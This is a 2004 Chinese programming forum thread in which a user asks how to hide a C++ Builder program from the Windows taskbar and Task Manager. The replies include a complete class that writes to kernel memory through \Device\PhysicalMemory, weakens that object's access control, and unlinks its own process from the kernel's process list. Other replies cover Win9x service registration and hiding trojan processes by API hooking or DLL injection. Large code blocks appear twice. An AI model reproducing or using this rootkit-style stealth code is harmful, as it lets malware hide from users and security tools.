1,222
社区成员
发帖
与我相关
我的任务
分享我想用CB写一个程序,让它在Win任务管理器的进程里看不到!请帮忙!~~~~
我的想实现让它在任务栏看不到.?
也不能让它在进程管理器中看到!就是隐藏进程.?
我的这个程序是想让他来检测另一个进程(如QQ.exe)是否存在! 要是不存在!则弹出一个窗口提示!再运行QQ.exe.
用什么方法来检测这个QQ.exe的进程.?
请知道做的高手帮帮忙!
也不能让它在进程管理器中看到!就是隐藏进程.?
我的这个程序是想让他来检测另一个进程(如QQ.exe)是否存在! 要是不存在!则弹出一个窗口提示!再运行QQ.exe.
用什么方法来检测这个QQ.exe的进程.?
请知道做的高手帮帮忙!
...全文
请发表友善的回复…
发表回复
jiangchun_xn 2004-06-12
- 打赏
- 举报
为什么不用dll注入,兼容性也好
lianghao2 2004-06-08
- 打赏
- 举报
XUE
bocwg 2004-06-08
- 打赏
- 举报
靠,搞得我都对做程序没兴趣了。
kinglh 2004-05-14
- 打赏
- 举报
to visual_cjiajia(bios(阿贡))
请帮帮忙了!! 把要的头文件和TMyHideProcess类给我了!! 我修改了很久! 还是很多错!!
请帮帮忙了!! 把要的头文件和TMyHideProcess类给我了!! 我修改了很久! 还是很多错!!
kinglh 2004-05-13
- 打赏
- 举报
visual_cjiajia(bios(阿贡)) 谢谢你给这么多的代码! 我想问一下TMyHideProcess是怎样定义的! 还有要那些头文件!! 谢谢!
对那些底层的东东我不会!!!请再帮帮忙!~!
对那些底层的东东我不会!!!请再帮帮忙!~!
kinglh 2004-05-12
- 打赏
- 举报
谢谢! MSDA(被程序折磨着)这个可以实现了~
那位能不能教教我怎么做隐藏进程! ?? 我用上面的方法不行!! 真的郁闷!~!
那位能不能教教我怎么做隐藏进程! ?? 我用上面的方法不行!! 真的郁闷!~!
visual_cjiajia 2004-05-12
- 打赏
- 举报
PVOID TMyHideProcess::LinearToPhys(PULONG BaseAddress,PVOID addr)
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
PGDE=BaseAddress[VAddr>>22];
if ((PGDE&1)!=0)
{
ULONG tmp=PGDE&0x00000080;
if (tmp!=0)
{
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
}
else
{
PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if ((PTE&1)!=0)
{
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0;
}
}
else return 0;
return (PVOID)PAddr;
}
ULONG TMyHideProcess::GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return 0;
ULONG ret=tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
BOOL TMyHideProcess::SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
tmp[(phys & 0xFFF)>>2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}
BOOL TMyHideProcess::HideProcess2000()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0)
{
return FALSE;
}
ULONG thread=GetData((PVOID)0xFFDFF124);
ULONG process=GetData(PVOID(thread+0x22c));
ULONG fw=GetData(PVOID(process+0xa0));
ULONG bw=GetData(PVOID(process+0xa4));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw);
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
}
void TMyHideProcess::HideProcess98()
{
typedef bool __stdcall (*pRegisterService)(DWORD,DWORD);
HMODULE hKernel = LoadLibrary("kernel32.dll");
if(hKernel)
{
pRegisterService RegisterService =(pRegisterService)GetProcAddress(hKernel,"RegisterServiceProcess");
if(RegisterService)
{
RegisterService(::GetCurrentProcessId(),RSP_SIMPLE_SERVICE);
}
FreeLibrary(hKernel);
hKernel = NULL;
}
}
void TMyHideProcess::DoHideMe()
{
switch (OSversion)
{
case 98:
HideProcess98();
break;
case 2000:
HideProcess2000();
break;
default:
return;
break;
}
}
{
ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr;
PGDE=BaseAddress[VAddr>>22];
if ((PGDE&1)!=0)
{
ULONG tmp=PGDE&0x00000080;
if (tmp!=0)
{
PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF);
}
else
{
PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
if ((PTE&1)!=0)
{
PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
else return 0;
}
}
else return 0;
return (PVOID)PAddr;
}
ULONG TMyHideProcess::GetData(PVOID addr)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, 4, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return 0;
ULONG ret=tmp[(phys & 0xFFF)>>2];
UnmapViewOfFile(tmp);
return ret;
}
BOOL TMyHideProcess::SetData(PVOID addr,ULONG data)
{
ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr);
PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);
if (tmp==0)
return FALSE;
tmp[(phys & 0xFFF)>>2]=data;
UnmapViewOfFile(tmp);
return TRUE;
}
BOOL TMyHideProcess::HideProcess2000()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0)
{
return FALSE;
}
ULONG thread=GetData((PVOID)0xFFDFF124);
ULONG process=GetData(PVOID(thread+0x22c));
ULONG fw=GetData(PVOID(process+0xa0));
ULONG bw=GetData(PVOID(process+0xa4));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw);
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
}
void TMyHideProcess::HideProcess98()
{
typedef bool __stdcall (*pRegisterService)(DWORD,DWORD);
HMODULE hKernel = LoadLibrary("kernel32.dll");
if(hKernel)
{
pRegisterService RegisterService =(pRegisterService)GetProcAddress(hKernel,"RegisterServiceProcess");
if(RegisterService)
{
RegisterService(::GetCurrentProcessId(),RSP_SIMPLE_SERVICE);
}
FreeLibrary(hKernel);
hKernel = NULL;
}
}
void TMyHideProcess::DoHideMe()
{
switch (OSversion)
{
case 98:
HideProcess98();
break;
case 2000:
HideProcess2000();
break;
default:
return;
break;
}
}
visual_cjiajia 2004-05-12
- 打赏
- 举报
偶都 在DELPHI版贴过N遍了:
TMyHideProcess::TMyHideProcess(int theosver)
{
OSversion=theosver;
InitNTDLL() ;
}
TMyHideProcess::~TMyHideProcess()
{
CloseNTDLL();
}
BOOL TMyHideProcess::InitNTDLL()
{
g_hNtDLL = NULL;
g_pMapPhysicalMemory = NULL;
g_hMPM = NULL;
g_hNtDLL = LoadLibrary( "ntdll.dll" );
if ( !g_hNtDLL )
{
return FALSE;
}
RtlInitUnicodeString =
(RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection =
(ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
return TRUE;
}
VOID TMyHideProcess::CloseNTDLL()
{
if(g_hNtDLL != NULL)
{
FreeLibrary(g_hNtDLL);
}
}
VOID TMyHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl=NULL;
PACL pNewDacl=NULL;
PSECURITY_DESCRIPTOR pSD=NULL;
DWORD dwRes;
EXPLICIT_ACCESS ea;
if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
{
goto CleanUp;
}
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
{
goto CleanUp;
}
if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
goto CleanUp;
}
CleanUp:
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
HANDLE TMyHideProcess::OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}
if( !NT_SUCCESS( status ))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
TMyHideProcess::TMyHideProcess(int theosver)
{
OSversion=theosver;
InitNTDLL() ;
}
TMyHideProcess::~TMyHideProcess()
{
CloseNTDLL();
}
BOOL TMyHideProcess::InitNTDLL()
{
g_hNtDLL = NULL;
g_pMapPhysicalMemory = NULL;
g_hMPM = NULL;
g_hNtDLL = LoadLibrary( "ntdll.dll" );
if ( !g_hNtDLL )
{
return FALSE;
}
RtlInitUnicodeString =
(RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString");
ZwOpenSection =
(ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");
return TRUE;
}
VOID TMyHideProcess::CloseNTDLL()
{
if(g_hNtDLL != NULL)
{
FreeLibrary(g_hNtDLL);
}
}
VOID TMyHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
{
PACL pDacl=NULL;
PACL pNewDacl=NULL;
PSECURITY_DESCRIPTOR pSD=NULL;
DWORD dwRes;
EXPLICIT_ACCESS ea;
if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS)
{
goto CleanUp;
}
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = "CURRENT_USER";
if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS)
{
goto CleanUp;
}
if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS)
{
goto CleanUp;
}
CleanUp:
if(pSD)
LocalFree(pSD);
if(pNewDacl)
LocalFree(pNewDacl);
}
HANDLE TMyHideProcess::OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED)
{
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
}
if( !NT_SUCCESS( status ))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4,
0,
0x30000,
0x1000);
if( g_pMapPhysicalMemory == NULL )
{
return NULL;
}
return g_hMPM;
}
woshialber 2004-05-12
- 打赏
- 举报
给你贴一个我找到的文章,原作者是谁我忘了^_^
API的拦截技术,通过建立一个后台的系统钩子,拦截PSAPI的EnumProcessModules等相关的函数来实现对进程和服务的遍历调用的控制,当检测到进程ID(PID)为木马程序的服务器端进程的时候直接跳过.这样就实现了进程的隐藏。
API的拦截技术,通过建立一个后台的系统钩子,拦截PSAPI的EnumProcessModules等相关的函数来实现对进程和服务的遍历调用的控制,当检测到进程ID(PID)为木马程序的服务器端进程的时候直接跳过.这样就实现了进程的隐藏。
781014 2004-05-11
- 打赏
- 举报
你家伙想做木马。
jiangfeng999 2004-05-11
- 打赏
- 举报
必须编辑WinMain函数来程序的主窗口和程序的任务条图标。
第一步:从C++Builder菜单中选择 View|Project Source然后开始编辑WinMain函数。调用ShowWindow函数,传递Application->Handle,可以隐藏程序的任务条图标。设置ShowMainForm为False可以让主窗口不在屏幕上显示。
WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
try
{
Application->Initialize();
Application->CreateForm(__classid(TForm1), &Form1);
Application->ShowMainForm = false;
ShowWindow(Application->Handle, SW_HIDE);
Application->Run();
}
catch (Exception &exception)
{
Application->ShowException(&exception);
}
return 0;
}
第二步:当你想显示程序时执行下面这两行代码。记住,如果代码定位在主窗口类的一个方法中,Application->MainForm->Visible=true可以用Visible=true 来代替。
ShowWindow(Application->Handle, SW_SHOW);
Application->MainForm->Visible = true;
第一步:从C++Builder菜单中选择 View|Project Source然后开始编辑WinMain函数。调用ShowWindow函数,传递Application->Handle,可以隐藏程序的任务条图标。设置ShowMainForm为False可以让主窗口不在屏幕上显示。
WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
try
{
Application->Initialize();
Application->CreateForm(__classid(TForm1), &Form1);
Application->ShowMainForm = false;
ShowWindow(Application->Handle, SW_HIDE);
Application->Run();
}
catch (Exception &exception)
{
Application->ShowException(&exception);
}
return 0;
}
第二步:当你想显示程序时执行下面这两行代码。记住,如果代码定位在主窗口类的一个方法中,Application->MainForm->Visible=true可以用Visible=true 来代替。
ShowWindow(Application->Handle, SW_SHOW);
Application->MainForm->Visible = true;
kinglh 2004-05-11
- 打赏
- 举报
不是的!! 我只是想让另一个程序不要被关掉! 但是我又不想让别人看到我的程序!
请给点代码! 我试过:
DWORD dwVersion = GetVersion(); //取得Windows的版本号
if (dwVersion >= 0x80000000) //Windows 9x隐藏任务列表
{
int (CALLBACK *rsp) (DWORD,DWORD) ;
HINSTANCE dll = LoadLibrary("kernel32.dll"); //装入KERNEL32.DLL
rsp = (int(CALLBACK *)(DWORD,DWORD))GetProcAddress(dll,"ResgisterServiceProcess") ; //RegisterServiceProcess的入口
rsp(NULL,1) ; //注册服务
FreeLibrary(dll); //释放DLL模块
}
但是好像不行!!
请给点代码! 我试过:
DWORD dwVersion = GetVersion(); //取得Windows的版本号
if (dwVersion >= 0x80000000) //Windows 9x隐藏任务列表
{
int (CALLBACK *rsp) (DWORD,DWORD) ;
HINSTANCE dll = LoadLibrary("kernel32.dll"); //装入KERNEL32.DLL
rsp = (int(CALLBACK *)(DWORD,DWORD))GetProcAddress(dll,"ResgisterServiceProcess") ; //RegisterServiceProcess的入口
rsp(NULL,1) ; //注册服务
FreeLibrary(dll); //释放DLL模块
}
但是好像不行!!
woshialber 2004-05-11
- 打赏
- 举报
呵呵
网上一大堆这样的文章
比如说
ShotGun的文章《NT系统下木马进程的隐藏与检测》
网上一大堆这样的文章
比如说
ShotGun的文章《NT系统下木马进程的隐藏与检测》
